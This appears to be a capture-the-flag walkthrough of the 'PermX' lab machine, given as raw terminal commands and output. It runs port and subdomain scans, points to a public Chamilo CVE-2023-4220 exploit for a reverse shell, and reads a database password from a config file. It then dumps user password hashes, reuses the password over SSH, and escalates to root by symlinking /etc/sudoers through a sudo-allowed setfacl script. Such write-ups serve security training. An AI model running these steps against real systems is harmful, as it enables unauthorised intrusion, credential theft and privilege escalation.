└─$ nmap -p- --open 10.10.11.23                            
Nmap scan report for 10.10.11.23
Host is up (0.065s latency).
Not shown: 61637 closed tcp ports (reset), 3896 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

└─$ nmap -p 22,80 --open 10.10.11.23 -sCV 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 14:36 EDT
Nmap scan report for 10.10.11.23
Host is up (0.11s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://permx.htb
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
**********************************************************************************************************************************************************************************************************************************************************
Subdomain Enumeration:

└─$ ffuf -u http://permx.htb -H "Host:FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fw 18

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://permx.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.permx.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 18
________________________________________________

www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 65ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 110ms]

**********************************************************************************************************************************************************************************************************************************************************
└─$ gobuster dir -u http://lms.permx.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://lms.permx.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/main                 (Status: 301) [Size: 313] [--> http://lms.permx.htb/main/]
/web                  (Status: 301) [Size: 312] [--> http://lms.permx.htb/web/]
/documentation        (Status: 301) [Size: 322] [--> http://lms.permx.htb/documentation/]
**********************************************************************************************************************************************************************************************************************************************************
the /documentation reveal the vulnerable chamilo version Chamilo 1.11.24
**********************************************************************************************************************************************************************************************************************************************************
Use of an exploit:
https://github.com/charlesgargasson/CVE-2023-4220 for revshell
**********************************************************************************************************************************************************************************************************************************************************
stumbled upon configuration.php and in that the db_password:

www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ cat /var/www/chamilo/app/config/configuration.php | grep -i "password"        
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
...
...
...
**********************************************************************************************************************************************************************************************************************************************************
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ mysql -u chamilo -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 35030
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
**********************************************************************************************************************************************************************************************************************************************************
RABBITHOLE!!!!!!!!!!!!!!!!

MariaDB [chamilo]> SELECT * FROM user;                                                                                                                                                                                                                                                                                                                                                     
+----+---------+----------+--------------------+-----------------------+-----------------------+--------+---------+---------+---------------------+-----------------------+------------+-----------+-----------+--------------------------------------------------------------+-----------------+---------+---------------------------------------------+---------------------+------------+------------+--------------------+-----------------------+------------------------------------+-------------------+-------------+--------+---------------+-------------+------------+-------------+----------+----------+-------+-------------+----------+---------------------+-----------------+--------+--------+-------+------------+                                                                                                                                                                                                            
| id | user_id | username | username_canonical | email_canonical       | email                 | locked | enabled | expired | credentials_expired | credentials_expire_at | expires_at | lastname  | firstname | password                                                     | phone           | address | salt                                        | last_login          | created_at | updated_at | confirmation_token | password_requested_at | roles                              | profile_completed | auth_source | status | official_code | picture_uri | creator_id | competences | diplomas | openarea | teach | productions | language | registration_date   | expiration_date | active | openid | theme | hr_dept_id |                                                                                                                                                                                                            
+----+---------+----------+--------------------+-----------------------+-----------------------+--------+---------+---------+---------------------+-----------------------+------------+-----------+-----------+--------------------------------------------------------------+-----------------+---------+---------------------------------------------+---------------------+------------+------------+--------------------+-----------------------+------------------------------------+-------------------+-------------+--------+---------------+-------------+------------+-------------+----------+----------+-------+-------------+----------+---------------------+-----------------+--------+--------+-------+------------+                                                                                                                                                                                                            
|  1 |       1 | admin    | admin              | admin@permx.htb       | admin@permx.htb       |      0 |       1 |       0 |                   0 | NULL                  | NULL       | Miller    | Davis     | $2y$04$1Ddsofn9mOaa9cbPzk0m6euWcainR.ZT2ts96vRCKrN7CGCmmq4ra | (000) 001 02 03 |         | awb0kMoTumbFvi22ojwv.Pg92gFTMOt837kWsGVbJN4 | 2024-01-20 18:44:07 | NULL       | NULL       | NULL               | NULL                  | a:1:{i:0;s:16:"ROLE_SUPER_ADMIN";} |              NULL | platform    |      1 | ADMIN         |             |          0 | NULL        | NULL     | NULL     | NULL  | NULL        | english  | 2024-01-20 18:20:32 | NULL            |      1 | NULL   | NULL  |          0 |                                                                                                                                                                                                            
|  2 |       2 | anon     | anon               | anonymous@example.com | anonymous@example.com |      0 |       1 |       0 |                   0 | NULL                  | NULL       | Anonymous | Joe       | $2y$04$wyjp2UVTeiD/jF4OdoYDquf4e7OWi6a3sohKRDe80IHAyihX0ujdS |                 |         | Mr1pyTT.C/oEIPb/7ezOdrCDKM.KHb0nrXAUyIyt/MY | NULL                | NULL       | NULL       | NULL               | NULL                  | a:0:{}                             |              NULL | platform    |      6 | anonymous     |             |          0 | NULL        | NULL     | NULL     | NULL  | NULL        | english  | 2024-01-20 18:20:32 | NULL            |      1 | NULL   | NULL  |          0 |                                                                                                                                                                                                            
+----+---------+----------+--------------------+-----------------------+-----------------------+--------+---------+---------+---------------------+-----------------------+------------+-----------+-----------+--------------------------------------------------------------+-----------------+---------+---------------------------------------------+---------------------+------------+------------+--------------------+-----------------------+------------------------------------+-------------------+-------------+--------+---------------+-------------+------------+-------------+----------+----------+-------+-------------+----------+---------------------+-----------------+--------+--------+-------+------------+                                                                                                                                                                                                            
2 rows in set (0.001 sec)
**********************************************************************************************************************************************************************************************************************************************************
logged in with the db_password as mtz:
└─$ ssh mtz@10.10.11.23 
Last login: Sun Oct 13 19:49:47 2024 from 10.10.14.153
mtz@permx:~$ ls -l
total 16
-rwxrwxr-x+ 1 mtz  mtz   27 Oct 13 19:58 my_script.sh
-rwxrwxr-x+ 1 mtz  mtz  260 Oct 13 19:55 script.sh
-rw-rw-r--  1 mtz  mtz    0 Oct 13 19:54 sir
-rw-rw-r--+ 1 mtz  mtz 1774 Oct 13 19:59 Sir_Reda
-rw-r-----  1 root mtz   33 Oct 12 13:04 user.txt
**********************************************************************************************************************************************************************************************************************************************************
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
**********************************************************************************************************************************************************************************************************************************************************
mtz@permx:~$ cat /opt/acl.sh
#!/bin/bash

if [ "$#" -ne 3 ]; then
    /usr/bin/echo "Usage: $0 user perm file"
    exit 1
fi

user="$1"
perm="$2"
target="$3"

if [[ "$target" != /home/mtz/* || "$target" == *..* ]]; then
    /usr/bin/echo "Access denied."
    exit 1
fi

# Check if the path is a file
if [ ! -f "$target" ]; then
    /usr/bin/echo "Target must be a file."
    exit 1
fi

/usr/bin/sudo /usr/bin/setfacl -m u:"$user":"$perm" "$target"

**********************************************************************************************************************************************************************************************************************************************************
create a symlink:

mtz@permx:~$ ln -s /etc/sudoers /home/mtz/sudoerss
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/sudoerss

add the following line under the sudoers file:
mtz@permx:~$ vi /etc/sudoers
mtz ALL=(ALL:ALL) NOPASSWD: ALL
mtz@permx:~$ sudo su
root@permx:/home/mtz#
**********************************************************************************************************************************************************************************************************************************************************
root@permx:/home/mtz# cat /root/root.txt 
90c7a329f.....
**********************************************************************************************************************************************************************************************************************************************************
